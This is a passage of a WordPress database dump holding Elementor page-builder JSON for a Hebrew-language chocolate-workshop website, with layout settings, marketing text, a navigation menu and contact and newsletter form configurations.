_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(339,85,'_elementor_version','0.4'),(340,85,'_elementor_template_type','post'),(341,86,'_wp_page_template','elementor_canvas'),(342,86,'_elementor_edit_mode','builder'),(343,86,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent 